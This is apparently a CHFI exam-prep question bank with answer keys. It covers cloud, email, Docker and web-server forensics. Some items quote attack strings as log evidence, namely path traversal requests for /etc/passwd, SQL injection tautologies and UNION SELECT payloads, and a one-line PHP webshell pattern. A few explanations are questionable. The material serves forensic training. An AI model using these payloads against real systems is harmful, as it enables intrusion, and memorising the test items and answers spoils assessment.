In cloud environments, physical servers host virtual machines from multiple customers simultaneously, meaning forensic investigators must retrieve evidence from shared infrastructure without compromising other tenants' data. A logical volume snapshot or hypervisor memory capture may inadvertently include artifacts from co-resident workloads, creating legal and ethical isolation problems. This challenge is cloud-specific because in traditional on-premise forensics the media belongs exclusively to the subject organization, whereas cloud providers enforce isolation only through software boundaries like virtual LANs and hypervisor controls.

Why this answer

Multi-tenancy complicates data isolation, and data jurisdiction affects legal access to data across regions.

29
Multi-Selecthard

Which THREE of the following are common challenges specific to cloud forensics? (Select THREE)

Select 3 answers
A.Data jurisdiction and legal compliance across regions
B.Volatility of evidence due to auto-scaling and ephemeral instances
C.Inability to acquire physical hard drives
D.Lack of standardized log formats
E.High cost of forensic tools
AnswersA, B, C

Cloud data resides in provider-controlled regions, so forensic acquisition must satisfy differing disclosure, privacy and data-protection laws. This legal fragmentation across jurisdictions directly constrains where evidence can be collected and how it may be transferred, satisfying the cross-region compliance challenge named in the stem.

Why this answer

Option A is correct because cloud data is stored in provider regions worldwide, so investigators must navigate differing data-protection laws (e.g., GDPR), cross-border legal processes, and jurisdictional conflicts over where evidence resides and who controls it. Option B is correct because auto-scaling, serverless functions, and ephemeral instances can be terminated or recycled at any time, destroying volatile evidence such as RAM contents, running processes, and temporary logs before acquisition can occur. Option C is correct because in cloud environments the customer has no physical access to the underlying hardware; forensic acquisition must rely on provider-mediated methods like VM snapshots, EBS volume copies, or APIs rather than seizing physical hard drives.

Option D is not a cloud-specific challenge, since inconsistent log formats are a general logging issue across on-premises and cloud systems rather than unique to cloud forensics. Option E is not a cloud-specific challenge either, as the cost of forensic tools applies broadly to all digital investigations and is not an inherent characteristic of cloud computing.

Exam trap

EC-Council often tests the distinction between general forensic challenges and those that are unique to cloud environments, so candidates mistakenly select 'Lack of standardized log formats' or 'High cost of forensic tools' because they are real issues, but they are not specific to cloud forensics.

30
MCQmedium

An analyst discovers a suspicious file named 'cmd.aspx' in the uploads directory of an IIS web server. Analysis reveals the file contains code to execute system commands. What is this file most likely?

A.A log file
B.A benign configuration file
C.A web shell
D.A backup of a legitimate page
AnswerC

A file placed in a web-accessible upload directory that executes system commands is a web shell, giving the attacker remote command execution through HTTP requests. The .aspx extension confirms it runs under IIS via ASP.NET, matching the scenario's server.

Why this answer

A web shell is a malicious script uploaded to a web server (like IIS) that allows an attacker to execute arbitrary system commands through the web interface. The file 'cmd.aspx' is an ASP.NET page, and its ability to execute system commands is the hallmark of a web shell, often used for post-exploitation persistence and remote access.

Exam trap

EC-Council often tests the misconception that any .aspx file in an uploads directory is legitimate, but the key differentiator is the presence of code that executes system commands, which is unique to a web shell.

How to eliminate wrong answers

Option A is wrong because a log file records events or errors and does not contain executable code to run system commands. Option B is wrong because a benign configuration file (e.g., web.config) defines server settings and does not include command execution logic. Option D is wrong because a backup of a legitimate page would preserve original functionality, not introduce command execution capabilities.

31
MCQeasy

An email forensic analyst receives a suspicious email and wants to trace its origin. Which email header field provides the most reliable information about the IP address of the sending SMTP server?

A.Return-Path
B.Received
C.DKIM-Signature
D.X-Originating-IP
AnswerB

The Received header is the standard, reliable source for tracing the sending server's IP address in email forensics. Each SMTP server that handles the message adds a Received header that records the IP address (and often the hostname) of the server from which it received the message, along with a timestamp. The first Received header (reading from the bottom of the message) identifies the original sender's server, while each subsequent header documents each hop in the delivery chain. These headers are added automatically by mail servers and are much more difficult to spoof than user-controlled headers, making them the primary evidence for IP identification.

Why this answer

The 'Received' header is the most reliable source for tracing the origin of an email because each SMTP server that handles the message adds a new 'Received' header at the top, recording the IP address of the sending server (from the HELO/EHLO handshake) and the receiving server. The bottommost 'Received' header typically contains the IP address of the original sending SMTP server, as it is added by the first receiving MTA. This field is standardized in RFC 5321 and is the primary forensic artifact for email source identification.

Exam trap

The EC-Council CHFI exam often tests the misconception that X-Originating-IP is the most reliable source because it appears to directly show the sender's IP, but candidates must remember it is a non-standard header that can be easily forged or omitted, whereas the 'Received' header chain is a mandatory, traceable part of the SMTP protocol.

How to eliminate wrong answers

Option A is wrong because the Return-Path header (RFC 5321) contains the envelope sender (bounce address), not the IP address of the sending server; it is set by the Mail User Agent or the final MTA and can be forged. Option C is wrong because the DKIM-Signature header (RFC 6376) contains a cryptographic signature and the selector domain (d=), but it does not directly reveal the sending SMTP server's IP address; it only indicates the domain claiming responsibility for the message. Option D is wrong because X-Originating-IP is a non-standard, proprietary header often added by webmail services (e.g., Hotmail, Yahoo) to log the client's IP, but it is not universally present, not part of the SMTP protocol, and can be omitted or spoofed by the originating server.

32
MCQmedium

A security analyst is investigating a containerized application running on a Docker host. The analyst needs to collect forensic evidence from a stopped container without starting it. Which of the following Docker commands should be used to export the container's filesystem as a tar archive?

A.docker commit
B.docker export
C.docker cp
D.docker save
AnswerB

docker export is the correct command because it streams the container's entire filesystem into a flat tar archive, exactly the kind of backup or migration artifact the analyst would need. It captures the full root filesystem as the container sees it, including all runtime changes, but intentionally omits image metadata and layer history. This tar can be piped to a file or imported later with docker import to reconstruct a filesystem as an image.

Why this answer

The `docker export` command creates a tar archive of a container's filesystem, even if the container is stopped, without starting it. This is the correct tool for extracting forensic evidence from a stopped container's filesystem as a single archive file.

Exam trap

The trap here is confusing `docker export` (container filesystem to tar) with `docker save` (image layers to tar), as both produce tar archives but target different objects (container vs. image).

How to eliminate wrong answers

Option A is wrong because `docker commit` creates a new image from a container's changes, not a tar archive of the filesystem, and it requires the container to be running. Option C is wrong because `docker cp` copies files or directories between a container and the host filesystem, but it does not export the entire filesystem as a tar archive and requires the container to be running. Option D is wrong because `docker save` exports one or more Docker images (not containers) as a tar archive, including metadata and layers, which is used for image migration, not container filesystem extraction.

33
MCQhard

A forensic investigator is analyzing a compromised web server. In the Apache access logs, the investigator finds the following request: 'GET /images/../../../etc/passwd HTTP/1.1' with a 200 status code. Which of the following is the MOST likely reason the server returned a 200 (OK) response?

A.The server redirected the request to the root directory and returned the index page
B.The server has a custom 404 page that returns a 200 status code
C.The request was blocked by a web application firewall (WAF) which returned a 200 status
D.The server is vulnerable to directory traversal and returned the contents of /etc/passwd
AnswerD

A 200 OK status in response to a directory traversal payload—such as a URL containing ../../etc/passwd—strongly indicates that the server successfully accessed and returned the specified file. In a vulnerable web server, improper path sanitization allows the attacker to escape the web root and retrieve sensitive system files, with the response body containing the file's contents (e.g., root:x:0:0:root:/root:/bin/bash). This is the classic signature of a path traversal vulnerability, as the server processes the '../' sequences and serves the requested file. The combination of the traversal payload and a 200 status, along with the file content in the response, confirms successful exploitation.

Why this answer

A 200 response to a path traversal request indicates that the server executed the request and returned the file content, meaning the directory traversal attack succeeded.

34
Multi-Selecthard

A forensic investigator is examining a compromised Docker container on a Linux host. The investigator needs to collect volatile evidence from the running container before it is stopped. Which two actions should the investigator perform to capture the container's memory and running processes? (Choose two.)

Select 2 answers
A.Run 'docker logs <container_id>' to capture the container's stdout and stderr output
B.Use 'docker diff <container_id>' to list changes to the container's filesystem
C.Use 'docker checkpoint' to create a checkpoint of the running container, including its memory state
D.Run 'docker exec -it <container_id> ps aux' to list running processes inside the container
E.Use 'docker cp' to copy the container's /proc directory to the host for analysis
AnswersC, D

Docker checkpoint (using CRIU) captures the entire state of a running container, including memory, CPU registers, and open files, and saves it to disk. This allows the investigator to preserve volatile memory for later analysis without stopping the container. It is a valid method for capturing memory evidence from a running container.

Why this answer

To capture volatile evidence from a running Docker container, the investigator should list running processes and capture memory state. Running 'ps aux' inside the container provides a snapshot of active processes, while 'docker checkpoint' preserves the container's memory and state. Other options like copying /proc, reading logs, or checking filesystem diffs do not capture memory or process information reliably.

Exam trap

The trap here is assuming that copying /proc or reading logs captures memory, when these methods only provide partial or non-volatile data.

35
MCQmedium

A security analyst reviewing Apache access logs finds entries like: 192.168.1.10 - - [12/Jan/2023:15:23:11 +0000] "GET /search?q=1' OR '1'='1 HTTP/1.1" 200 5324. What attack is indicated?

A.Cross-site scripting (XSS)
B.SQL injection
C.Path traversal
D.Command injection
AnswerB

SQL injection occurs when attacker-controlled input is concatenated directly into a SQL statement without parameterization, changing the query's logic. The literal payload '1' OR '1'='1' is a textbook tautology: if placed in a WHERE clause (e.g., WHERE user='admin' AND password='1' OR '1'='1'), it evaluates TRUE for every row, allowing authentication bypass or data exfiltration. Web application firewalls often flag this exact pattern, and the correct remediation is prepared statements/parameterized queries, strict input validation, and least-privilege database accounts.

Why this answer

The log entry shows a SQL injection attempt via the 'q' parameter with a tautology. The 200 response indicates the request was processed, suggesting possible success.

36
MCQmedium

A web server log shows the following request: 'GET /../../../../etc/passwd HTTP/1.1' with a 200 response code. The web server is running Apache on Linux. What attack has likely succeeded?

A.Remote File Inclusion (RFI)
B.SQL injection
C.Cross-Site Request Forgery (CSRF)
D.Local File Inclusion (LFI) or Path Traversal
AnswerD

Local File Inclusion (LFI) or Path Traversal is correct because the URI uses the ../ sequence to escape the web root and access an arbitrary local file, /etc/passwd. The pattern /etc/passwd after multiple directory traversal segments indicates the web application is likely vulnerable to including or exposing local files via its handling of the requested path. This is a classic LFI/path traversal scenario where an attacker can read sensitive system files by manipulating the path input, and the file path resolution occurs on the server's local filesystem.

Why this answer

The request 'GET /../../../../etc/passwd HTTP/1.1' with a 200 response indicates the server successfully returned the contents of the /etc/passwd file. This is a classic path traversal attack (also known as Local File Inclusion) where the attacker uses '../' sequences to escape the web root directory and access arbitrary files on the Linux filesystem. Apache's default configuration does not block such sequences if directory traversal protections are missing, allowing the attacker to read sensitive system files.

Exam trap

A common mistake in the CHFI exam is confusing Local File Inclusion (LFI) with Remote File Inclusion (RFI). The key differentiator is that LFI uses relative path traversal (../) to access local files, while RFI includes a remote URL. This request accesses /etc/passwd via path traversal, indicating LFI.

How to eliminate wrong answers

Option A is wrong because Remote File Inclusion (RFI) involves including a remote file (e.g., from an external URL) into the server's execution context, not traversing local directories to read a local file. Option B is wrong because SQL injection targets database queries via input fields (e.g., ' OR 1=1 --), not file path manipulation in HTTP requests. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into making unintended requests on their behalf, and does not involve direct file path traversal in a GET request.

37
MCQeasy

Which email header field is specifically used to verify that an email was not tampered with during transit and is signed by the sender's domain?

A.X-Originating-IP
B.Message-ID
C.Received
D.DKIM-Signature
AnswerD

DKIM-Signature contains a digital signature computed over selected canonicalized header fields and the message body using a private key held by the sending domain. The verifier retrieves the sender's public key from DNS (e.g., dkim._domainkey.example.com) to decrypt the hash and compare it to the hashed current content, thereby detecting any modification since signing. Because the signature is cryptographically bound to the message content and the signing domain, it specifically provides the required verification of both origin and integrity.

Why this answer

The DKIM-Signature header field is the correct answer because it provides a cryptographic signature that allows the receiver to verify that the email was not altered in transit and that it originated from the claimed domain. DKIM (DomainKeys Identified Mail) uses public-key cryptography, where the sender's domain publishes a public key in DNS, and the sending server signs the email with the corresponding private key. This ensures both integrity and domain-level authentication, directly matching the question's requirement.

Exam trap

A common misconception is that the Received header can verify integrity because it shows the mail path, but it lacks cryptographic signing and can be manipulated by any intermediate server. EC-Council expects you to know that only DKIM provides cryptographic integrity verification tied to the sender's domain.

How to eliminate wrong answers

Option A is wrong because X-Originating-IP is a non-standard header that records the IP address of the original sender's client, but it provides no cryptographic integrity verification or domain-level signing. Option B is wrong because Message-ID is a unique identifier for the email message, used for tracking and threading, but it has no security properties to verify tampering or sender domain authenticity. Option C is wrong because the Received header is added by each mail transfer agent (MTA) along the delivery path to trace the route, but it does not include a cryptographic signature and can be easily forged or modified by intermediate servers.

38
MCQeasy

An investigator needs to parse and analyze a Microsoft Outlook personal folders file (.pst). Which tool is specifically designed for this purpose?

A.Aid4Mail
B.FTK Imager
C.Wireshark
D.Sleuth Kit
AnswerA

Aid4Mail is purpose-built for email forensics, with a native parser that navigates Outlook's proprietary PST B-Tree structure and heap-node architecture to extract individual items such as messages, contacts, and calendar entries. It handles both ANSI and Unicode PST formats, preserves metadata and deleted-item remnants, and can export evidence to MSG, EML, or PDF while maintaining hash integrity for court presentation. This makes it the correct choice over generic disk or network tools for analyzing an Outlook mailbox.

Why this answer

Aid4Mail is a forensic email analysis tool that can parse Outlook PST files, among other formats, and extract metadata, attachments, and headers.

39
MCQmedium

An email forensic investigator examines a suspicious email and notices the following header: Received: from mail.evil.com (192.168.1.100) by mail.company.com. The DKIM-Signature header fails verification. What does this indicate?

A.The receiving server rejected the email
B.The email is legitimate and was forwarded through a relay
C.The email was sent from a compromised mail server
D.The email may be spoofed or its content altered
AnswerD

A DKIM failure means the message's signature does not verify against the public key published in the claimed sending domain's DNS records. This can occur when an attacker spoofs the domain and sends unsigned or incorrectly signed mail, or when the message body or selected headers were changed after the original signature was applied. Either way, the email is unreliable and may have been tampered with, directly supporting the conclusion that it is potentially spoofed or altered.

Why this answer

A failing DKIM-Signature indicates the email may have been tampered with during transit or was not signed by the claimed domain. This is a strong indicator of email spoofing or alteration.

40
Multi-Selecteasy

Which TWO of the following are valid email header fields that can be used to detect email spoofing? (Select 2)

Select 2 answers
A.Subject
B.Received-SPF
C.Content-Type
D.MIME-Version
E.DKIM-Signature
AnswersB, E

The Received-SPF header is specifically designed for authentication and is inserted by the receiving mail system after it evaluates the envelope sender against the publishing domain's SPF policy. The header records the check result (e.g., pass, fail, softfail), the HELO identity, and the client IP, providing traceable evidence of the SPF verdict. This makes Received-SPF a modern, standards-based email header that is valid for verifying and auditing sender authorization.

Why this answer

SPF and DKIM are email authentication mechanisms that help detect spoofing. SPF checks if the sending server is authorized, DKIM verifies the email integrity.

41
MCQeasy

Which email header field is MOST reliable for identifying the true origin of an email, assuming no header tampering occurred at the initial MTA?

A.Received
B.Message-ID
C.From
D.DKIM-Signature
AnswerA

Received headers are prepended by every SMTP server that handles the message, so the bottom-most (earliest) Received line is added by the first device that accepts the message. This often reflects the original connecting IP address unless the sender controls a relay server that deliberately strips or alters headers. In forensic analysis, this chain is the most reliable source of the true origin.

Why this answer

The 'Received' header is the most reliable for identifying the true origin of an email because each MTA that processes the message adds a new 'Received' header at the top, recording the IP address and timestamp of the previous hop. Assuming no tampering occurred at the initial MTA, the bottommost 'Received' header (the first added) contains the originating IP address of the sender's MTA or client, providing a direct trace back to the source.

Exam trap

EC-CHFI often tests the misconception that the 'From' header is reliable for origin identification, but the trap is that 'From' is easily spoofed and is not validated by SMTP, whereas 'Received' headers are added by each MTA and provide a verifiable chain of custody.

How to eliminate wrong answers

Option B is wrong because the Message-ID header is a unique identifier generated by the sending MUA or MTA, but it does not contain any routing or origin IP information; it is used for threading and deduplication, not for tracing the sender's location. Option C is wrong because the 'From' header is a user-supplied field that can be easily spoofed or forged, as it is not validated by the SMTP protocol (RFC 5321) and only represents the claimed sender, not the actual origin. Option D is wrong because the DKIM-Signature header validates that the email was signed by a domain's private key and has not been altered in transit, but it does not directly reveal the originating IP address or MTA; it only confirms the signing domain's involvement, which may be a third-party service.

42
MCQeasy

Which of the following is a unique challenge in cloud forensics compared to traditional digital forensics?

A.Encryption of data at rest
B.Lack of network connectivity
C.Inability to acquire disk images
D.Multi-tenancy and data isolation
AnswerD

Multi-tenancy is a defining architectural property of cloud computing, where multiple customers share the same physical hardware and storage. This creates a unique forensic challenge: isolating a target tenant's evidence without exposing or processing co-tenant data, which may be subject to privacy and legal protections. Investigators must use careful acquisition methods, such as provider-supported volume snapshots, and may need court orders tailored to prevent data leakage. The co-mingling of data across tenants is a challenge with no direct analog in traditional single-owner digital forensics.

Why this answer

In cloud forensics, multi-tenancy and data isolation present a unique challenge because multiple customers share the same physical infrastructure, and forensic investigators must ensure that data acquisition from one tenant does not inadvertently expose or contaminate another tenant's data. This requires careful coordination with the cloud provider to isolate logical boundaries, often using techniques like snapshot-based acquisition or API-driven evidence collection, which are not typical in traditional single-owner digital forensics.

Exam trap

The EC-Council CHFI exam often tests the misconception that encryption is the primary cloud forensic challenge, but the real unique issue is multi-tenancy and data isolation due to shared infrastructure and legal/privacy boundaries.

How to eliminate wrong answers

Option A is wrong because encryption of data at rest is a challenge in both cloud and traditional forensics; it is not unique to the cloud. Option B is wrong because lack of network connectivity is a general forensic challenge that can occur in any environment, not specific to cloud forensics. Option C is wrong because inability to acquire disk images is not a defining challenge; cloud forensics can acquire disk images via provider APIs or snapshots, though the process differs from physical acquisition.

43
MCQmedium

During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?

A.Review the IAM policies attached to the user to determine if the action was authorized
B.Immediately disable the IAM user account
C.Escalate the issue to law enforcement
D.Check the S3 bucket's access logs for the same IP address
AnswerA

In an AWS environment, CloudTrail's AccessDenied record indicates the request was evaluated and explicitly rejected by IAM, but it does not reveal why. Reviewing the IAM policies attached to the user — including group and any applicable SCPs — determines whether the action was within authorized scope or whether a policy misconfiguration caused the denial. This also provides context for the user's intent, distinguishing a legitimate attempt from a potential unauthorized access probe, making it the correct first forensic step.

Why this answer

AccessDenied indicates the user lacks permissions; check IAM policies to see if the user should have access or if it's an unauthorized attempt.

44
MCQmedium

In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?

A.Azure AD Sign-In Logs
B.Azure Activity Log
C.Azure Diagnostic Logs
D.Azure Network Watcher Logs
AnswerB

The Azure Activity Log is the subscription's control-plane audit trail for all Azure Resource Manager operations, generated whenever a resource is created, modified, or deleted. It captures authorization operations under 'Microsoft.Authorization', such as roleAssignments/write, roleAssignments/delete, or roleDefinitions/write, recording the caller (user, application, or service principal), the exact scope, the action, and the timestamp. Querying these events is the definitive forensic way to determine which principal obtained or lost a specific RBAC role, whether at the management group, subscription, resource group, or resource scope.

Why this answer

Azure Activity Log (now part of Azure Monitor) records all control-plane operations, including role assignments and privilege escalations. When a user assigns a role to another user, that action is logged as a 'Microsoft.Authorization/roleAssignments/write' event in the Activity Log, which captures the caller's identity (UPN or Object ID), the target user, and the role assigned. This makes it the definitive source for identifying who performed the role assignment.

Exam trap

EC-CHFI often tests the distinction between authentication logs (Sign-In Logs) and authorization logs (Activity Logs), so the trap here is that candidates mistakenly choose Azure AD Sign-In Logs because they associate 'user' and 'role' with identity, not realizing that role assignments are control-plane operations logged in the Activity Log.

How to eliminate wrong answers

Option A is wrong because Azure AD Sign-In Logs track authentication events (successful/failed logins, MFA challenges, and sign-in risks), not authorization changes like role assignments. Option C is wrong because Azure Diagnostic Logs are resource-level logs (e.g., from VMs, app services, or databases) that capture internal application or OS events, not Azure RBAC operations. Option D is wrong because Azure Network Watcher Logs capture network traffic analytics, flow logs, and connectivity issues, not identity or role management activities.

45
MCQhard

During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?

A.VPC Flow Logs
B.Amazon Inspector findings
C.AWS Config
D.AWS CloudTrail
AnswerD

AWS CloudTrail is the authoritative service for API activity logging in AWS, recording every management event (and optionally data events) as a CloudTrail log file. Each event includes the user identity (IAM user, role, or federated principal), source IP address, user agent, AWS region, event name, request parameters, and response elements. This enables a forensic analyst to trace exactly which API call was made, by whom, and from which IP address, making it the correct source for determining API call origin during an investigation.

Why this answer

AWS CloudTrail records all API calls made to the AWS environment, including the `RunInstances` action that launches EC2 instances. Each CloudTrail event contains the `sourceIPAddress` field, which captures the IP address from which the IAM credentials were used. This makes CloudTrail the definitive log to identify the origin of the unauthorized activity.

Exam trap

EC-Council CHFI exams often test the distinction between network-level logs (VPC Flow Logs) and API-level logs (CloudTrail), leading candidates to mistakenly choose VPC Flow Logs because they associate 'source IP' with network traffic rather than API call metadata.

How to eliminate wrong answers

Option A is wrong because VPC Flow Logs capture network traffic at the IP/port level (e.g., packets between EC2 instances and external hosts), not the API-level authentication events that record which IAM credentials were used or the source IP of the credential usage. Option B is wrong because Amazon Inspector is a vulnerability assessment service that scans for software vulnerabilities and network exposure, not a logging service for API calls or credential usage. Option C is wrong because AWS Config tracks resource configuration changes and compliance over time (e.g., whether an EC2 instance has a specific tag), but it does not log the source IP address of the API call that created the resource.

46
MCQeasy

Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?

A.EmailTrackerPro
B.Wireshark
C.Volatility
D.FTK Imager
AnswerA

EmailTrackerPro is a dedicated email header analysis utility that parses the full raw header block of an email message, extracting the complete delivery path as recorded in each 'Received' field. It maps the route taken from the original sender through each intermediary Mail Transfer Agent (MTA), resolving and visualizing IP addresses, timestamps, and server hostnames. This makes it the appropriate tool for tracing email provenance and identifying the actual sending relay in phishing or spam investigations.

Why this answer

EmailTrackerPro is specifically designed to analyze email headers and trace the path of an email.

47
Multi-Selecthard

A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?

Select 2 answers
A.The service account can be used to escalate privileges by attaching it to resources
B.The audit logging is now disabled for that service account
C.The service account's keys are automatically rotated
D.Cross-project access may allow lateral movement
E.The service account can now impersonate any user in the project
AnswersA, D

The iam.serviceAccountUser role permits a principal to attach that service account to Compute Engine instances or other resources, inheriting its permissions. Granting it cross-project lets the grantee impersonate the service account and thereby escalate beyond their own project's rights.

Why this answer

Option A is correct because the iam.serviceAccountUser role grants the ability to attach a service account to a resource (for example, deploying a Compute Engine instance or Cloud Function that runs as that service account), which can let a principal act with the service account's permissions and escalate privileges. Option D is correct because granting this role to a service account from a different project creates a cross-project trust path, enabling lateral movement from the attacker's project into the target project's resources. Option B is wrong because granting iam.serviceAccountUser does not disable or modify audit logging.

Option C is wrong because key rotation is not triggered by this role grant and is unrelated to it. Option E is wrong because iam.serviceAccountUser does not grant user impersonation; that requires roles/iam.serviceAccountTokenCreator or the iam.serviceAccounts.getAccessToken permission.

Exam trap

The distinction between 'iam.serviceAccountUser' (which allows using the service account on resources) and 'iam.serviceAccountTokenCreator' (which allows impersonation and token generation) is often tested, leading candidates to mistakenly think the role enables user impersonation.

48
MCQmedium

Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?

A.Content-Type
B.Received
C.X-Mailer
D.DKIM-Signature
AnswerD

DKIM-Signature carries a cryptographic signature created with the sending domain's private key, letting the receiver validate that the message genuinely originated from that domain and was not altered in transit. This directly satisfies the stem's requirement to verify the sending server's domain and prevent spoofing.

Why this answer

DKIM-Signature is the correct answer because it is an email authentication method that uses a digital signature to verify the domain of the sending server. It allows the receiver to check that the email was not forged or altered during transit, directly preventing domain spoofing. This header is defined in RFC 6376 and is a core component of email authentication frameworks like DMARC.

Exam trap

EC-Council often tests the distinction between headers used for authentication (DKIM-Signature) versus headers used for routing or metadata (Received, X-Mailer), leading candidates to mistakenly choose Received because it shows server hops, but it does not verify domain ownership.

How to eliminate wrong answers

Option A is wrong because Content-Type is a MIME header that specifies the media type of the message body (e.g., text/plain or multipart/mixed) and has no role in authentication or spoofing prevention. Option B is wrong because Received is a trace header added by each mail transfer agent (MTA) along the delivery path; it is used for routing diagnostics and forensic tracing, not for verifying the sending domain's authenticity. Option C is wrong because X-Mailer is an informal header that indicates the email client software used to compose the message (e.g., Outlook or Thunderbird) and is easily forged, providing no security or authentication function.

49
MCQmedium

An analyst examining Apache access logs finds the following entry: 192.168.1.10 - - [10/Oct/2023:13:55:36 -0400] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5324 "-" "Mozilla/5.0". Which of the following attacks is MOST likely occurring?

A.SQL injection
B.Cross-site scripting (XSS)
C.Remote file inclusion
D.Path traversal
AnswerA

The payload contains SQL code trying to manipulate the query.

Why this answer

The log entry shows a GET request to /search.php with a query parameter q containing the SQL injection payload 1' OR '1'='1. This classic tautology-based SQL injection attempts to manipulate the SQL query to always return true, potentially bypassing authentication or extracting data. The 200 OK response and 5324 bytes indicate the server processed the malicious input, confirming the attack is SQL injection.

Exam trap

EC-Council often tests the distinction between SQL injection and XSS by using payloads that contain SQL syntax; here the single quote and OR '1'='1 tautology clearly target the database layer, not client-side script execution. Candidates might instead confuse this with path traversal or remote file inclusion, but the query-string SQL tautology confirms SQL injection.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) would inject client-side scripts (e.g., <script>alert(1)</script>) into the response, not SQL tautologies; the payload here targets the database, not the browser. Option C is wrong because remote file inclusion (RFI) involves including a remote file via a URL (e.g., http://evil.com/shell.txt), not a SQL tautology in a query parameter. Option D is wrong because path traversal uses directory traversal sequences (e.g., ../../../etc/passwd) to access files outside the web root, not SQL syntax to manipulate database queries.

50
MCQhard

In a Google Cloud Platform (GCP) environment, a forensic investigator needs to determine who deleted a Cloud Storage bucket and when. Which log type should be queried to obtain this information?

A.Cloud Monitoring metrics
B.VPC flow logs
C.Cloud Storage access logs
D.Cloud Audit Logs (Admin Activity)
AnswerD

Cloud Audit Logs (Admin Activity) are the correct source because they capture all control-plane API calls that modify configuration or metadata, including the storage.buckets.delete method that removes a Cloud Storage bucket. These administrative audit logs record the authenticated principal, the API method, the target resource, the request metadata, and the response status, giving investigators a complete attribution trail for the deletion. This audit log is enabled by default in GCP for all projects, making it the authoritative forensic evidence for bucket deletion events.

Why this answer

Cloud Audit Logs (Admin Activity) in GCP record all API calls that modify the configuration or metadata of resources, including the deletion of a Cloud Storage bucket. These logs capture the identity of the principal who performed the action, the timestamp, and the specific operation (e.g., `storage.buckets.delete`), making them the authoritative source for answering who deleted a bucket and when.

Exam trap

EC-Council CHFI often tests the distinction between data-plane logs (access logs) and control-plane logs (admin activity audit logs), and the trap here is that candidates mistakenly choose Cloud Storage access logs because they associate 'deletion' with bucket-level activity, not realizing that bucket deletion is a configuration change logged only in Admin Activity audit logs.

How to eliminate wrong answers

Option A is wrong because Cloud Monitoring metrics provide performance and utilization data (e.g., request counts, latency) but do not log identity or timestamps of specific administrative actions like bucket deletion. Option B is wrong because VPC flow logs capture network traffic metadata (source/destination IP, ports, protocol) for packets flowing through VPC networks, not control-plane operations such as bucket deletion. Option C is wrong because Cloud Storage access logs (also known as usage logs) record data-access events (e.g., object reads, writes) at the bucket level, but they do not capture admin-level changes like bucket deletion; deletion of the bucket itself is a configuration change logged only in Admin Activity audit logs.

51
MCQmedium

In Docker forensics, which of the following commands would you use to inspect the history of an image, including the commands that created each layer?

A.docker image ls
B.docker history
C.docker logs
D.docker inspect
AnswerB

The `docker history` command displays the full layer chain of an image, listing each layer's ID, creation time, size, and the corresponding build command (e.g., RUN, COPY, ENV) that produced it. This makes it the definitive tool for forensically reconstructing how an image was built, as it reveals every instruction executed during the build process, including potentially malicious commands embedded in a Dockerfile. It also shows 'missing' intermediate layers that are not physically stored on the host, providing a complete timeline of image assembly.

Why this answer

The `docker history` command displays the history of an image, showing each layer along with the command that created it. This is essential in forensic investigations to trace how an image was built, including any potentially malicious commands embedded in the layers.

Exam trap

EC-Council CHFI often tests the distinction between `docker inspect` (which shows metadata) and `docker history` (which shows layer creation commands), leading candidates to confuse the two when asked about build history.

How to eliminate wrong answers

Option A is wrong because `docker image ls` lists all images on the host, showing repository, tag, image ID, and size, but does not reveal the layer history or build commands. Option C is wrong because `docker logs` retrieves the console output from a running or stopped container, not the image layer history. Option D is wrong because `docker inspect` returns detailed metadata about an image or container in JSON format, including configuration and network settings, but does not show the sequential layer commands that built the image.

52
MCQeasy

An analyst examines the following Apache access log entry: 192.168.1.10 - - [10/Jan/2023:13:45:22 +0000] "GET /search.php?q=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0". Which attack is MOST likely indicated?

A.Path Traversal
B.SQL Injection
C.Cross-Site Scripting (XSS)
D.Remote File Inclusion
AnswerB

The URL-encoded payload `1' UNION SELECT 1,2,3--` in the query string is the defining signature: the apostrophe closes the string literal, UNION SELECT appends attacker-controlled columns, and `--` comments out the remainder. This satisfies the stem's request to identify the attack from the log entry, confirming SQL injection rather than XSS or traversal.

Why this answer

The log shows a UNION SELECT statement in the query parameter, indicating a SQL injection attempt. The URL-encoded single quote (') and comment (--) are classic SQLi payloads.

53
Multi-Selectmedium

Which TWO of the following are indicators of a webshell on a web server? (Select TWO.)

Select 2 answers
A.A file named 'cmd.php' with a modification date matching other legitimate files
B.The file contains system commands executed via GET or POST parameters
C.A recently modified file with a timestamp different from other files in the same directory
D.The server's index.html file is missing
E.The file is over 1 MB in size
AnswersB, C

A webshell's defining characteristic is the ability to execute arbitrary system commands via user-controlled input, typically through HTTP request parameters. For example, a PHP backdoor might contain code such as `<?php system($_GET['cmd']); ?>` or `<?php eval($_POST['cmd']); ?>`, which directly feeds attacker-supplied data into an OS command interpreter or a dynamic code evaluation function. This functional signature is the most direct and reliable indicator because it is the core mechanism that makes the file useful as a webshell, regardless of filename obfuscation or timestamp manipulation.

Why this answer

Webshells often have recent modification times out of sync with other files, and they typically accept command parameters in GET/POST requests. Large file size alone is not definitive, and missing index.html is unrelated.

54
MCQeasy

Which email header field is used to verify that an email was sent by the authorized mail server for the domain and has not been tampered with, using cryptographic signatures?

A.X-Mailer
B.Message-ID
C.Received-SPF
D.DKIM-Signature
AnswerD

The DKIM-Signature header contains a cryptographic digital signature (typically RSA or Ed25519) computed over selected headers and the message body using a private key held by the signing domain. The receiving server retrieves the signer's public key via a DNS TXT record and verifies the signature, ensuring that the message was not altered in transit and that it genuinely originates from the claimed domain. This cryptographic binding provides strong integrity and origin authentication, which is exactly what is needed to verify that an email was not tampered with and comes from the stated source.

Why this answer

DKIM (DomainKeys Identified Mail) uses a digital signature to verify the email's origin and integrity.

55
MCQmedium

An investigator is analyzing a compromised MySQL database server. To determine the exact time and content of a suspect data exfiltration query, which MySQL log should be examined first, assuming it is enabled?

A.General query log
B.Error log
C.Binary log
D.Slow query log
AnswerA

